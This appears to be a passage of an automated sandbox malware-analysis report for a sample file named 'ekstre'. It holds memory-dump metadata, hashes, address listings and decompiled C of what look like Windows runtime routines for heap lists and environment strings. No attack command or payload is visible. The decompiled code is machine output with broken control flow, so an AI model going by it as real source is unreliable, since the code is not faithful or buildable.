0x3417ca71
0x3417ca73
0x3417ca78
0x3417ca7b
0x3417ca7e
0x3417ca81
0x3417ca88
0x3417ca88
0x3417ca83
0x3417ca83
0x3417ca83
0x3417ca8a
0x3417ca8d
0x3417ca90
0x3417ca97
0x3417ca97
0x3417ca92
0x3417ca92
0x3417ca92
0x3417ca99
0x3417ca9c
0x3417ca9f
0x3417caa4
0x3417caa4
0x3417caad
0x3417cab7
0x3417cab7
0x00000000
0x3417ca71
0x3417c958
0x3417c95a
0x3417ca09
0x3417ca0c
0x3417ca0d
0x3417ca11
0x3417ca13
0x3417ca14
0x3417ca19
0x3417ca1b
0x3417ca24
0x3417ca27
0x3417ca2a
0x3417ca31
0x3417ca33
0x3417ca33
0x3417ca39
0x3417ca39
0x3417ca3c
0x3417ca40
0x00000000
0x00000000
0x3417ca42
0x3417ca1d
0x3417ca1d
0x3417ca1d
0x00000000
0x3417ca1b
0x3417c960
0x3417c967
0x3417c96e
0x3417c984
0x3417c989
0x3417c98b
0x3417c991
0x3417c993
0x3417c9b9
0x3417c9bb
0x3417c9c1
0x3417c9c3
0x3417c9db
0x3417c9dd
0x3417c9e0
0x00000000
0x3417c9e0
0x3417c9c5
0x3417c9c8
0x3417c9ce
0x3417c9e5
0x00000000
0x3417c9d0
0x3417c9d0
0x3417c9d5
0x00000000
0x3417c9d5
0x3417c995
0x3417c995
0x3417c99c
0x3417c9ef
0x3417c9ef
0x3417c9f1
0x3417c9f2
0x3417c9f4
0x3417c9f6
0x3417c9f7
0x3417c9f9
0x3417c9fd
0x3417ca02
0x3417ca05
0x3417ca07
0x00000000
0x00000000
0x00000000
0x3417ca07
0x3417c7f9
0x3417c7f9
0x00000000
0x3417c7f9
0x3417c7dd
0x3417c7d0
0x3417c7b5
0x3417c77e
0x00000000
0x00000000
0x3417c786
0x00000000
0x3417c788
0x3417c788
0x3417c78d
0x00000000
0x3417c78d
0x00000000
0x00000000
0x00000000
0x3417d3fa
0x3417d3fa
0x3417d3fa
0x3417d3ff
0x3417d402
0x3417d40a
0x3417d40b
0x3417d40c
0x3417d41a
0x3417d41a

Strings

MUI, xrefs: 3417C7E3, 3417C960

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 6c52f8049a37853e6f45b9307ed78f26433db0e5a00aab92562e607ec93b1c47
Instruction ID: 9c1f676e596b3585a51bf8630c9506e5c93638b33b5aeb026528ad1ce86becf1
Opcode Fuzzy Hash: 6c52f8049a37853e6f45b9307ed78f26433db0e5a00aab92562e607ec93b1c47
Instruction Fuzzy Hash: 08824DB5E00B18CFEB24CFA9C9C079DBBB5FF48350F5181A9E859AB250EB349945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 341764F0 Relevance: 1.9, APIs: 1, Instructions: 383
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E341764F0(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				intOrPtr _v72;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				char _t170;
				signed short _t178;
				signed int _t183;
				signed int _t191;
				signed int _t197;
				signed int _t198;
				signed int _t202;
				signed int _t206;
				signed int _t209;
				intOrPtr _t211;
				signed int _t231;
				intOrPtr _t232;
				signed int _t241;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				intOrPtr _t248;
				intOrPtr _t250;
				signed int _t252;
				signed int _t259;
				signed int _t260;
				signed int _t262;
				signed int* _t265;
				intOrPtr _t267;
				signed int _t270;
				signed int _t276;
				signed int* _t278;
				signed int* _t281;
				signed int _t282;
				intOrPtr _t284;
				intOrPtr _t285;
				signed int _t286;
				intOrPtr _t289;
				intOrPtr* _t290;
				void* _t292;
				signed int _t293;
				intOrPtr _t297;
				signed int _t300;
				void* _t302;
				intOrPtr _t303;
				signed int _t311;
				signed int _t317;
				void* _t319;

				_t319 = (_t317 & 0xfffffff8) - 0x3c;
				_t241 = 0;
				_v61 = 0;
				_t167 = __ecx + 0xb4;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_v56 = 0;
				_v60 = 0;
				_v24 = _t167;
				if(__edx == _t167) {
					_t168 =  *_t167;
					_v61 = _t168 != 0;
					_v60 = _t168 == 0;
					goto L7;
				} else {
					 *_t167 = 0;
					_t183 =  &_v12;
					_v8 = _t183;
					_v12 = _t183;
					_t259 = _a8 * 8 - _a8;
					_t185 = __edx + _t259 * 4;
					_t260 = _a4;
					_t17 = _t185 + 4; // 0x14
					_v28 = __edx + _t259 * 4;
					_t300 = _t260;
					 *_t17 =  *_t17 - 1 + _t260;
					_t311 = (_t260 << 4) + __edx;
					_t262 = __edx + 0x10 + (_t260 * 8 - _t260) * 4;
					do {
						_t191 =  *(_t311 - 0x10);
						_t311 = _t311 - 0x10;
						_t262 = _t262 - 0x1c;
						_v32 = _t191;
						_t300 = _t300 - 1;
						_v44 = _t262;
						if(_t191 != 0) {
							if(_v61 != 0) {
								_v36 = _t191 + 0x14;
								E341B8C00(_t262 - 0x10, _t311, 0x10);
								_t319 = _t319 + 0xc;
								 *((intOrPtr*)(_v44 + 8)) = _v28;
								L34182330(_v44, _v36);
								_t265 = _v36 + 0x18;
								_v20 = _t265;
								_t286 = _t265[1];
								_t197 =  *_t265;
								_v24 = _t197;
								if( *_t286 != _t265) {
									L59:
									asm("int 0x29");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t267 = _v72;
									_t198 = _t197 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if(_t198 == 0) {
										 *0x342691e0(_t267, _t311);
										return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t267 + 4))))))();
									}
									return _t198;
								} else {
									_t202 = _v44;
									 *_t202 = _t265;
									 *(_t202 + 4) = _t286;
									 *_t286 = _t202;
									_t265[1] = _t202;
									E341824D0(_v36);
									_v52 = _v52 + 1;
									if(_v24 != _v20) {
										goto L24;
									} else {
										_t281 = _v8;
										_t197 = _v32 + 0xc;
										_t250 = _v56;
										if( *_t281 !=  &_v12) {
											goto L59;
										} else {
											 *(_t197 + 4) = _t281;
											 *_t197 =  &_v12;
											_t241 = _t250 + 1;
											 *_t281 = _t197;
											_v8 = _t197;
											_v56 = _t241;
											goto L23;
										}
									}
								}
							} else {
								_t282 = _v24;
								_v61 = 1;
								 *_t282 = _t191;
								 *((intOrPtr*)(_t282 + 4)) =  *((intOrPtr*)(_t311 + 4));
								 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t311 + 8));
								 *((intOrPtr*)(_t282 + 0xc)) =  *((intOrPtr*)(_t311 + 0xc));
								L23:
								_t289 = _v48;
								L24:
								_t262 = _v44;
								goto L4;
							}
						} else {
							_t289 = _v48;
							_v60 = 1;
							goto L4;
						}
						goto L72;
						L4:
					} while (_t300 != 0);
					_t206 = _a4 - 1;
					if(_t289 != _t206) {
						_t290 = _v28;
						asm("lock xadd [ecx], eax");
						if((_t206 | 0xffffffff) == 0) {
							_t232 =  *0x34266644; // 0x0
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t232 + 0x300000,  *_t290);
						}
					}
					if(_t241 != 0) {
						_t209 =  &_v12 - 0xc;
						_t302 = _v12 + 0xfffffff4;
						_t270 = 0xfffffffe;
						_v16 = _t209;
						_t311 = 0;
						_v44 = 0xfffffffe;
						if(_t302 != _t209) {
							_t248 = 0;
							do {
								_t231 = E341B6600(1,  *(_t302 + 4), 0);
								_t270 = _v44;
								_t311 = _t311 | _t231;
								if(_t270 != 0xffffffff) {
									if(_t270 != 0xfffffffe) {
										if(_t270 ==  *(_t302 + 4)) {
											goto L41;
										} else {
											_t270 = _t270 | 0xffffffff;
											goto L40;
										}
										while(1) {
											L48:
											_t197 = _v12;
											if(_t197 ==  &_v12) {
												break;
											}
											_t292 =  *_t197;
											if( *(_t292 + 4) != _t197) {
												goto L59;
											} else {
												_t276 =  *(_t197 + 4);
												if( *_t276 != _t197) {
													goto L59;
												} else {
													 *_t276 = _t292;
													 *(_t292 + 4) = _t276;
													_t293 = _t197;
													_t197 =  *((intOrPtr*)(_t303 + 0x14)) + ( *(_t197 - 8) +  *(_t197 - 8) * 2) * 4;
													_t278 =  *(_t197 + 4);
													if( *_t278 != _t197) {
														goto L59;
													} else {
														 *_t293 = _t197;
														 *(_t293 + 4) = _t278;
														 *_t278 = _t293;
														 *(_t197 + 4) = _t293;
														continue;
													}
												}
											}
											goto L72;
										}
										if(_v52 != 0) {
											_t245 = _v52;
											do {
												asm("bsr esi, ebx");
												E341824D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
												asm("btr ebx, esi");
											} while (_t245 != 0);
											_t241 = _v56;
											_t311 = _v40;
										}
										if(_t311 != 0) {
											_t246 = _v40;
											do {
												asm("bsr esi, ebx");
												E341824D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
												asm("btr ebx, esi");
											} while (_t246 != 0);
											_t241 = _v56;
										}
										goto L7;
									} else {
										_t270 =  *(_t302 + 4);
										L40:
										_v44 = _t270;
									}
								}
								L41:
								_t302 =  *((intOrPtr*)(_t302 + 0xc)) - 0xc;
							} while (_t302 != _v16);
							_v52 = _t248;
							_t241 = _v56;
							_v40 = _t311;
						}
						_t303 = _a12;
						E3416BD3D(_t303, _t270);
						_t211 = _v52;
						_v16 = _t311;
						if(_t311 != 0) {
							_t247 = _t311;
							do {
								asm("bsf esi, ebx");
								L34182330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
								asm("btr ebx, esi");
							} while (_t247 != 0);
							_t241 = _v56;
							_t311 = _v40;
							_t211 = _v52;
						}
						if(_t211 != 0) {
							_t244 = _v52;
							do {
								asm("bsf esi, ebx");
								L34182330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
								asm("btr ebx, esi");
							} while (_t244 != 0);
							_t241 = _v56;
							_t311 = _v40;
						}
						goto L48;
					} else {
						L7:
						_t169 = _a12;
						_t252 =  *(_t169 + 8);
						_t284 =  *((intOrPtr*)(_t169 + 0xc));
						do {
							_t170 =  *((intOrPtr*)(_t169 + 0xe4));
							_t297 = _t284;
							_v32 = _t252;
							_v58 = 0;
							_v59 = 0;
							_v57 = _t170;
							_t285 = _t297 + _t241;
							_v28 = _t285;
							if(_t170 == 0) {
								_t178 = (_t252 - 0x00000001 ^ _t252) & 0x0000ffff ^ _t252;
								_t252 = _t178;
								if(_v60 != 0) {
									_t252 = (_t252 >> 0x00000010) - 0x00000001 << 0x00000010 | _t178 & 0x0000ffff;
								}
								if(_v61 == 0) {
									if(_t285 == 0) {
										_v58 = 1;
										_t252 = _t252 ^ (_t252 + 0x00000001 ^ _t252) & 0x0000ffff;
									} else {
										_t285 = _t285 - 1;
										_v28 = _t285;
									}
								}
								if(_t241 != 0 || _v60 != _t241) {
									if(_t285 != 0) {
										if((_t252 & 0xffff0000) == 0) {
											_t252 = _t252 + 0x10000;
											_v59 = 1;
										}
									}
								}
							}
							_t284 = _t297;
							asm("lock cmpxchg8b [esi]");
							_t241 = _v56;
							_t252 = _v32;
							_t169 = _a12;
						} while (_t252 != _v32 || _t284 != _t297);
						if(_v59 != 0) {
							_push( *((intOrPtr*)(_t169 + 0x24)));
							E341B40A0();
						}
						 *_a16 = _v58;
						return _v57;
					}
				}
				L72:
			}

0x341764f8
0x341764fc
0x341764fe
0x34176503
0x34176509
0x34176511
0x34176519
0x34176521
0x34176525
0x34176529
0x34176531
0x341d0eef
0x341d0ef3
0x341d0efa
0x00000000
0x34176537
0x34176537
0x34176539
0x3417653d
0x34176541
0x3417654f
0x34176551
0x34176554
0x34176557
0x3417655a
0x34176560
0x34176565
0x34176573
0x3417657a
0x34176580
0x34176580
0x34176583
0x34176586
0x34176589
0x3417658d
0x3417658e
0x34176594
0x34176688
0x34176715
0x3417671e
0x34176727
0x34176732
0x34176735
0x3417673e
0x34176741
0x34176745
0x34176748
0x3417674a
0x34176750
0x341768f1
0x341768f6
0x341768f8
0x341768f9
0x341768fa
0x341768fb
0x341768fc
0x341768fd
0x341768fe
0x341768ff
0x34176905
0x34176908
0x3417690b
0x3417690f
0x3417691e
0x00000000
0x34176926
0x34176912
0x34176756
0x34176756
0x3417675e
0x34176760
0x34176763
0x34176765
0x34176768
0x34176776
0x3417677e
0x00000000
0x34176784
0x34176784
0x34176790
0x34176795
0x34176799
0x00000000
0x3417679f
0x341767a3
0x341767a6
0x341767a8
0x341767a9
0x341767ab
0x341767af
0x00000000
0x341767af
0x34176799
0x3417677e
0x3417668e
0x3417668e
0x34176692
0x34176697
0x3417669c
0x341766a2
0x341766a8
0x341766ab
0x341766ab
0x341766af
0x341766af
0x00000000
0x341766af
0x3417659a
0x3417659a
0x3417659e
0x00000000
0x3417659e
0x00000000
0x341765a3
0x341765a3
0x341765aa
0x341765ad
0x341766f7
0x34176701
0x34176705
0x341d0f06
0x341d0f1a
0x341d0f1a
0x34176705
0x341765b5
0x341767c0
0x341767c3
0x341767c6
0x341767cb
0x341767cf
0x341767d1
0x341767d7
0x341767d9
0x341767e0
0x341767ea
0x341767ef
0x341767f3
0x341767fa
0x341767ff
0x341d0f27
0x00000000
0x341d0f2d
0x341d0f2d
0x00000000
0x341d0f2d
0x34176870
0x34176870
0x34176870
0x3417687a
0x00000000
0x00000000
0x3417687c
0x34176881
0x00000000
0x34176883
0x34176883
0x34176888
0x00000000
0x3417688a
0x3417688a
0x3417688c
0x3417688f
0x3417689a
0x3417689d
0x341768a2
0x00000000
0x341768a4
0x341768a4
0x341768a6
0x341768a9
0x341768ab
0x00000000
0x341768ab
0x341768a2
0x34176888
0x00000000
0x34176881
0x341768b5
0x341768e8
0x341d0f64
0x341d0f67
0x341d0f76
0x341d0f7b
0x341d0f7e
0x341d0f82
0x341d0f86
0x341d0f86
0x341768b9
0x341768bf
0x341768c3
0x341768c6
0x341768d3
0x341768d8
0x341768db
0x341768df
0x341768df
0x00000000
0x34176805
0x34176805
0x34176808
0x34176808
0x34176808
0x341767ff
0x3417680c
0x3417680f
0x34176812
0x34176818
0x3417681c
0x34176820
0x34176820
0x34176824
0x3417682b
0x34176830
0x34176834
0x3417683a
0x3417683c
0x34176840
0x34176843
0x34176850
0x34176855
0x34176858
0x3417685c
0x34176860
0x34176864
0x34176864
0x3417686a
0x341d0f35
0x341d0f39
0x341d0f3c
0x341d0f4b
0x341d0f50
0x341d0f53
0x341d0f57
0x341d0f5b
0x341d0f5b
0x00000000
0x341765bb
0x341765bb
0x341765bb
0x341765be
0x341765c4
0x341765d0
0x341765d0
0x341765d6
0x341765d8
0x341765dc
0x341765e1
0x341765e6
0x341765ea
0x341765ed
0x341765f3
0x341765fd
0x34176604
0x34176606
0x34176612
0x34176612
0x34176619
0x3417661d
0x341766bb
0x341766c5
0x34176623
0x34176623
0x34176624
0x34176624
0x3417661d
0x3417662a
0x34176634
0x341766d2
0x341766d8
0x341766de
0x341766de
0x341766d2
0x34176634
0x3417662a
0x3417663e
0x34176647
0x3417664b
0x3417664f
0x34176651
0x34176654
0x3417666b
0x341766ea
0x341766ed
0x341766ed
0x34176676
0x34176680
0x34176680
0x341765b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003f2d5bb3c5430ca83b51bf4ffda372079c26f2e33bcbdd756603abb40eb2f6
Instruction ID: 5539e368c825409f18d4c24fbf5db43f3fdfaa351ef9cc428f10f485796c5632
Opcode Fuzzy Hash: 003f2d5bb3c5430ca83b51bf4ffda372079c26f2e33bcbdd756603abb40eb2f6
Instruction Fuzzy Hash: D4E18A74618741CFD304CF28C0D0A5ABBE1BF89368F558AADF49987361DB31E906CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3419B1E0 Relevance: 1.9, Strings: 1, Instructions: 629
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E3419B1E0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
				char _v8;
				signed int _v12;
				char _v20;
				signed int _v29;
				char _v30;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* __ebx;
				void* __ebp;
				signed int _t232;
				intOrPtr _t235;
				signed int _t236;
				signed int _t241;
				short* _t255;
				short* _t259;
				short* _t260;
				signed int _t261;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t282;
				void* _t284;
				signed int _t299;
				intOrPtr _t311;
				intOrPtr _t319;
				signed int _t322;
				signed int _t324;
				signed int _t327;
				signed short* _t334;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				intOrPtr _t344;
				signed int _t346;
				signed int _t350;
				signed int _t355;
				signed int _t356;
				intOrPtr _t357;
				signed int _t359;
				short* _t361;
				void* _t362;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				signed short _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				signed int _t388;
				signed int _t389;
				void* _t390;
				signed int _t392;
				intOrPtr _t397;
				signed int _t400;
				short* _t401;
				signed int _t402;
				short* _t403;
				signed int _t406;
				signed int _t408;
				void* _t409;
				signed int _t414;
				signed int _t415;
				void* _t416;
				void* _t417;
				signed int _t418;
				void* _t420;
				void* _t422;
				signed int _t424;
				signed int _t425;
				intOrPtr _t427;
				void* _t428;
				void* _t432;
				void* _t435;
				void* _t437;
				signed short _t438;
				intOrPtr _t441;
				signed int _t442;
				void* _t443;
				void* _t444;
				void* _t446;

				_push(0xfffffffe);
				_push(0x3424c5a8);
				_push(E341BAD20);
				_push( *[fs:0x0]);
				_t444 = _t443 - 0x54;
				_t232 =  *0x3426b370;
				_v12 = _v12 ^ _t232;
				_push(_t232 ^ _t442);
				 *[fs:0x0] =  &_v20;
				_v56 = 0;
				_v84 = 0;
				_v29 = 0;
				_v30 = 0;
				_t389 = _a12;
				if(_t389 == 0) {
					L120:
					_t235 = 0xc000000d;
					L66:
					 *[fs:0x0] = _v20;
					return _t235;
				}
				_t339 = _a8;
				if( *_t339 == 0) {
					goto L120;
				} else {
					_t236 = 1;
					while(_t236 < _t389) {
						_t388 =  *(_t339 + _t236 * 2) & 0x0000ffff;
						if(_t388 == 0 || _t388 == 0x3d) {
							goto L120;
						} else {
							_t236 = _t236 + 1;
							_t339 = _a8;
							continue;
						}
					}
					_t340 = _a16;
					__eflags = _t340;
					if(_t340 == 0) {
						L12:
						_t238 =  *( *[fs:0x18] + 0x30);
						_t327 =  *((intOrPtr*)(_t238 + 0x10));
						_v48 = _t327;
						_v100 = _t327;
						_v68 = 0;
						_t414 = 0;
						_v44 = 0;
						_t341 = _a4;
						__eflags = _t341;
						if(_t341 != 0) {
							_t342 =  *_t341;
							_v36 = _t342;
							__eflags =  *(_t327 + 0x48) - _t342;
							if( *(_t327 + 0x48) != _t342) {
								goto L14;
							}
							_t238 =  *(_t238 + 0x1c);
							__eflags = _t238;
							if(_t238 == 0) {
								L104:
								_v29 = 1;
								goto L14;
							} else {
								_t238 = E34192180(_t238);
								_t342 = _v36;
								__eflags = _t238;
								if(_t238 == 0) {
									goto L14;
								}
								goto L104;
							}
						} else {
							_v30 = 1;
							_v29 = 1;
							_t238 = E3417FED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							_t342 =  *(_t327 + 0x48);
							_v36 = _t342;
							_t414 = _v44;
							L14:
							_v8 = 0;
							_t400 = _t342;
							_v40 = _t400;
							_t328 = 0;
							_v52 = 0;
							__eflags = _t342;
							if(_t342 == 0) {
								L61:
								__eflags = _t414;
								if(_t414 != 0) {
									_t400 = _t414;
									_v40 = _t400;
								}
								__eflags = _t328;
								if(_t328 == 0) {
									__eflags = _a16;
									if(_a16 == 0) {
										goto L63;
									}
									__eflags = _t400;
									if(_t400 == 0) {
										_t415 = _a12;
										_t344 = _a20;
										_t241 = 6 + (_t415 + _t344) * 2;
										_t390 = 0;
										L75:
										_v60 = _t241;
										__eflags = _t241 - _t390;
										if(_t241 < _t390) {
											_t164 = _t344 + 2; // 0x2
											E341B8C00(_t400 + (_t164 + _t415) * 2, _t400, _t328 - _t400 & 0xfffffffe);
											_t416 = _t415 + _t415;
											L341B88C0(_t400, _a8, _t416);
											_t446 = _t444 + 0x18;
											_t329 = _v29;
											__eflags = _v29;
											if(_v29 != 0) {
												E341B8F40(0x342663a0, 0, 0x234);
												_t446 = _t446 + 0xc;
											}
											_t401 = _t400 + _t416;
											_v40 = _t401;
											 *_t401 = 0x3d;
											_t402 = _t401 + 2;
											_v40 = _t402;
											_t417 = _a20 + _a20;
											L341B88C0(_t402, _a16, _t417);
											_t403 = _t402 + _t417;
											_v40 = _t403;
											_t238 = 0;
											 *_t403 = 0;
											_v40 = _t403 + 2;
											__eflags = _a4;
											if(_a4 != 0) {
												goto L64;
											} else {
												_t343 = _v48;
												 *((intOrPtr*)(_t343 + 0x48)) = _v36;
												_t238 = _v60;
												 *((intOrPtr*)(_t343 + 0x290)) = _v60;
												 *((intOrPtr*)(_t343 + 0x294)) =  *((intOrPtr*)(_t343 + 0x294)) + 1;
												goto L65;
											}
										}
										_t346 = L3419B9FA(_t241);
										_v64 = _t346;
										__eflags = _t346;
										if(_t346 == 0) {
											L111:
											_v68 = 0xc000009a;
											goto L63;
										}
										__eflags = _t400;
										if(_t400 == 0) {
											_t418 = 0;
										} else {
											_t424 = _t400 - _v36;
											__eflags = _t424;
											_t418 = _t424 >> 1;
											L341B88C0(_t346, _v36, _t418 + _t418);
											_t444 = _t444 + 0xc;
											_t346 = _v64;
										}
										_v80 = _t346 + _t418 * 2;
										_t420 = _a12 + _a12;
										L341B88C0(_t346 + _t418 * 2, _a8, _t420);
										_t255 = _v80 + _t420;
										 *_t255 = 0x3d;
										_v80 = _t255 + 2;
										_t422 = _a20 + _a20;
										L341B88C0(_t255 + 2, _a16, _t422);
										_t259 = _v80 + _t422;
										 *_t259 = 0;
										_t260 = _t259 + 2;
										__eflags = _t400;
										if(_t400 == 0) {
											 *_t260 = 0;
											_t329 = _v29;
										} else {
											L341B88C0(_t260, _t400, _t328 - _t400 & 0xfffffffe);
											_t329 = _v29;
											__eflags = _v29;
											if(_v29 != 0) {
												E341B8F40(0x342663a0, 0, 0x234);
											}
										}
										_t350 = _a4;
										_t261 = _v64;
										__eflags = _t350;
										if(_t350 != 0) {
											 *_t350 = _t261;
										} else {
											_t350 = _v48;
											 *((intOrPtr*)(_t350 + 0x48)) = _t261;
											 *((intOrPtr*)(_t350 + 0x290)) = _v60;
											_t148 = _t350 + 0x294;
											 *_t148 =  *(_t350 + 0x294) + 1;
											__eflags =  *_t148;
										}
										__eflags = _v30;
										if(_v30 != 0) {
											_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
											E3417E740(_t350);
											_v30 = 0;
										}
										_t238 = L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v36);
										goto L64;
									}
									_v52 = _t400;
									while(1) {
										L70:
										_t270 =  *_t400 & 0x0000ffff;
										__eflags = _t270;
										if(_t270 == 0) {
											break;
										}
										while(1) {
											_t400 = _t400 + 2;
											_v52 = _t400;
											__eflags = _t270;
											if(_t270 == 0) {
												goto L70;
											}
											_t270 =  *_t400 & 0x0000ffff;
										}
									}
									_v52 = _t400 + 2;
									_t390 = E3419B870(_t342,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t342);
									_t328 = _v52;
									_t415 = _a12;
									_t355 = (_v52 - _v36 >> 1) + _t415 + _a20;
									__eflags = _t355;
									_t241 = 4 + _t355 * 2;
									_t400 = _v40;
									_t344 = _a20;
									goto L75;
								} else {
									L63:
									_t329 = _v29;
									L64:
									_t343 = _v48;
									L65:
									_v8 = 0xfffffffe;
									E3419B839(_t238, _t329, _t343);
									_t235 = _v68;
									goto L66;
								}
							}
							_t238 = _v84;
							_v80 = _v84;
							while(1) {
								L16:
								__eflags =  *_t400 - _t328;
								if( *_t400 == _t328) {
									break;
								}
								_t392 = _t400;
								_v92 = _t392;
								_t425 = 0;
								__eflags = 0;
								_v88 = 0;
								while(1) {
									_t400 = _t400 + 2;
									_v40 = _t400;
									_t273 =  *_t400 & 0x0000ffff;
									__eflags = _t273;
									if(_t273 == 0) {
										break;
									}
									__eflags = _t273 - 0x3d;
									if(_t273 != 0x3d) {
										continue;
									}
									_t425 = _t400 - _t392 >> 1;
									_v88 = _t425;
									_t400 = _t400 + 2;
									__eflags = _t400;
									_v40 = _t400;
									_t322 = _t400;
									_v56 = _t322;
									while(1) {
										__eflags =  *_t400 - _t328;
										if( *_t400 == _t328) {
											break;
										}
										_t400 = _t400 + 2;
										_v40 = _t400;
									}
									_t374 = _t400 - _t322;
									__eflags = _t374;
									_t375 = _t374 >> 1;
									_v80 = _t375;
									_v84 = _t375;
									break;
								}
								_t400 = _t400 + 2;
								_v40 = _t400;
								_t238 = _a8;
								_v72 = _t238;
								_v76 = _t392;
								_t356 = _a12;
								__eflags = _t356 - _t425;
								if(_t356 > _t425) {
									_t356 = _t425;
								}
								_t357 = _t238 + _t356 * 2;
								_v96 = _t357;
								while(1) {
									__eflags = _t238 - _t357;
									if(_t238 >= _t357) {
										break;
									}
									_v60 =  *_t238 & 0x0000ffff;
									_v64 =  *_t392 & 0x0000ffff;
									_t378 = _v60;
									_v32 = _t378;
									_t438 = _v64;
									__eflags = _t378 - _t438;
									if(_t378 == _t438) {
										L37:
										_t238 = _t238 + 2;
										_v72 = _t238;
										_t392 = _t392 + 2;
										_v76 = _t392;
										_t357 = _v96;
										continue;
									}
									__eflags = _t378 - 0x61;
									if(_t378 >= 0x61) {
										__eflags = _t378 - 0x7a;
										if(_t378 > 0x7a) {
											__eflags =  *0x34266914 - _t328; // 0x7ffd0654
											if(__eflags == 0) {
												goto L30;
											}
											_v60 = 0xc0;
											__eflags = _t378 - _v60;
											if(_t378 < _v60) {
												goto L30;
											}
											_t384 =  *0x34266914; // 0x7ffd0654
											_t319 =  *0x34266914; // 0x7ffd0654
											_t397 =  *0x34266914; // 0x7ffd0654
											_t378 = _v32 +  *((intOrPtr*)(_t397 + (( *(_t319 + (( *(_t384 + ((_t378 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t378 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t378 & 0xf)) * 2));
											_t238 = _v72;
											_t392 = _v76;
											L42:
											_v32 = _t378;
											goto L30;
										}
										_t66 =  &_v60;
										 *_t66 = _v60 + 0xffe0;
										__eflags =  *_t66;
										_t378 = _v60;
										goto L42;
									}
									L30:
									__eflags = _t438 - 0x61;
									if(_t438 >= 0x61) {
										__eflags = _t438 - 0x7a;
										if(_t438 > 0x7a) {
											__eflags =  *0x34266914 - _t328; // 0x7ffd0654
											if(__eflags != 0) {
												_v64 = 0xc0;
												__eflags = _t438 - _v64;
												if(_t438 >= _v64) {
													_t380 =  *0x34266914; // 0x7ffd0654
													_t311 =  *0x34266914; // 0x7ffd0654
													_t383 =  *0x34266914; // 0x7ffd0654
													_t438 = _t438 +  *((intOrPtr*)(_t383 + (( *(_t311 + (( *(_t380 + ((_t438 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t438 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t438 & 0xf)) * 2));
													_t378 = _v32;
													_t238 = _v72;
													_t392 = _v76;
												}
											}
										} else {
											_v64 = _v64 + 0xffe0;
											_t438 = _v64;
										}
									}
									__eflags = _t378 - _t438;
									if(_t378 == _t438) {
										goto L37;
									} else {
										_t238 = _t438 & 0x0000ffff;
										_t359 = (_t378 & 0x0000ffff) - (_t438 & 0x0000ffff);
										__eflags = _t359;
										L33:
										__eflags = _t359;
										if(__eflags == 0) {
											_t334 = _t400;
											_v52 = _t334;
											while(1) {
												L45:
												_t274 =  *_t334 & 0x0000ffff;
												__eflags = _t274;
												if(_t274 == 0) {
													break;
												}
												while(1) {
